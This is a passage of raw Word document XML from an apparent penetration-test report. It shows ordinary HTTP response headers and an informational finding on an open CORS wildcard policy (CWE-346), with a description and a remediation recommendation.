                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0BE8E3ED" w14:textId="77777777" w:rsidR="00D23AD3" w:rsidRPr="00DB64A3" w:rsidRDefault="00D23AD3" w:rsidP="00D23AD3">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Connection: close</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="4BA67F0A" w14:textId="77777777" w:rsidR="00D23AD3" w:rsidRPr="00DB64A3" w:rsidRDefault="00D23AD3" w:rsidP="00D23AD3">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB64A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Response:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="00D23AD3" w:rsidRPr="00DB64A3" w14:paraId="50BE24AD" w14:textId="77777777" w:rsidTr="00280358">
              <w:trPr>
                <w:trHeight w:val="2129"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="4D646FBC" w14:textId="77777777" w:rsidR="00D23AD3" w:rsidRPr="00DB64A3" w:rsidRDefault="00D23AD3" w:rsidP="00D23AD3">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>HTTP/1.1 200 OK</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="211F6115" w14:textId="77777777" w:rsidR="00D23AD3" w:rsidRPr="00DB64A3" w:rsidRDefault="00D23AD3" w:rsidP="00D23AD3">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Date: Fri, 31 May 2019 17:43:49 GMT</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4BDC17AE" w14:textId="77777777" w:rsidR="00D23AD3" w:rsidRPr="00DB64A3" w:rsidRDefault="00D23AD3" w:rsidP="00D23AD3">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Last-Modified: Wed, 22 May 2019 13:37:09 GMT</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="558538C3" w14:textId="77777777" w:rsidR="00D23AD3" w:rsidRPr="00DB64A3" w:rsidRDefault="00D23AD3" w:rsidP="00D23AD3">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>ETag</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>: "18550-3f4-5897a0fe16b40"</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="72DF86C6" w14:textId="77777777" w:rsidR="00D23AD3" w:rsidRPr="00DB64A3" w:rsidRDefault="00D23AD3" w:rsidP="00D23AD3">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Accept-Ranges: bytes</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="04425664" w14:textId="77777777" w:rsidR="00D23AD3" w:rsidRPr="00DB64A3" w:rsidRDefault="00D23AD3" w:rsidP="00D23AD3">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Content-Length: 1012</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7FF8E290" w14:textId="77777777" w:rsidR="00D23AD3" w:rsidRPr="00DB64A3" w:rsidRDefault="00D23AD3" w:rsidP="00D23AD3">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Content-Type: text/html</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0A189CE9" w14:textId="77777777" w:rsidR="00D23AD3" w:rsidRPr="00DB64A3" w:rsidRDefault="00D23AD3" w:rsidP="00D23AD3">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Connection: close</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6D484E04" w14:textId="77777777" w:rsidR="00D23AD3" w:rsidRDefault="00D23AD3" w:rsidP="00D23AD3">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>&lt;!DOCTYPE html&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="09E5D236" w14:textId="77777777" w:rsidR="00D23AD3" w:rsidRPr="00DB64A3" w:rsidRDefault="00D23AD3" w:rsidP="00D23AD3">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="2991F07E" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00F03F96" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:i/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B278F3F" w14:textId="77777777" w:rsidR="00304781" w:rsidRPr="00397EF0" w:rsidRDefault="00304781" w:rsidP="00D246C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57AF2C0B" w14:textId="77777777" w:rsidR="00CF0DE5" w:rsidRPr="00397EF0" w:rsidRDefault="00CF0DE5" w:rsidP="00CF0DE5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="13"/>
    <w:p w14:paraId="763978C3" w14:textId="77777777" w:rsidR="004B7AE8" w:rsidRPr="00397EF0" w:rsidRDefault="004B7AE8" w:rsidP="00D246C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15DAB7B8" w14:textId="77777777" w:rsidR="004B7AE8" w:rsidRPr="00397EF0" w:rsidRDefault="004B7AE8" w:rsidP="004B7AE8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc10703680"/>
      <w:r w:rsidRPr="00397EF0">
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Informational Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9594" w:type="dxa"/>
        <w:tblBorders>
          <w:insideH w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2005"/>
        <w:gridCol w:w="7589"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="2037DE57" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:trPr>
          <w:trHeight w:val="432"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9594" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00008B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02C6D076" w14:textId="77777777" w:rsidR="004B7AE8" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
            </w:pPr>
            <w:bookmarkStart w:id="21" w:name="InfoFindings"/>
            <w:bookmarkStart w:id="22" w:name="_Toc10703681"/>
            <w:r>
              <w:t>I1</w:t>
            </w:r>
            <w:r w:rsidRPr="00397EF0">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r>
              <w:t>Cross Origin Resource Sharing (CORS)</w:t>
            </w:r>
            <w:r w:rsidRPr="00397EF0">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r>
              <w:t>Open</w:t>
            </w:r>
            <w:bookmarkEnd w:id="22"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="1DFC897B" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A596E2D"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CVSS Score and Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73E47229" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="62271007" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7C32ED73"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CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="48CC56B4" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-346: Origin Validation Error</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="0942A683" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F9ED82E"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Affected Systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BD804F2" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00563090" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Systemic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="3BDB05C4" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5CFAA6F6"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="16E40E20" w14:textId="77777777" w:rsidR="00563090" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45FEA489" w14:textId="77777777" w:rsidR="00563090" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54FAFD7A" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="5380ECCD" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C78FEE0"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lastRenderedPageBreak/>
              <w:t>Recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28D6CCF0" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Any inappropriate domains should be removed from the CORS policy.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="57BF6421" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1409579B" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Retest Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="457294B3" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00F03F96" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="3373231A" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9594" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64711C4E" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRDefault="00563090" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The HTTP request and response </w:t>
            </w:r>
            <w:r w:rsidR="002E6AAF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>demonstrates</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> the applications use of a wildcard in the origin settings. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6257BFC4" w14:textId="77777777" w:rsidR="00563090" w:rsidRPr="00563090" w:rsidRDefault="00563090" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00563090">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Request:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="00563090" w:rsidRPr="00563090" w14:paraId="2FB23D81" w14:textId="77777777" w:rsidTr="00563090">
              <w:trPr>
                <w:trHeight w:val="1701"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="5B649D77" w14:textId="77777777" w:rsidR="00563090" w:rsidRPr="00563090" w:rsidRDefault="00563090" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
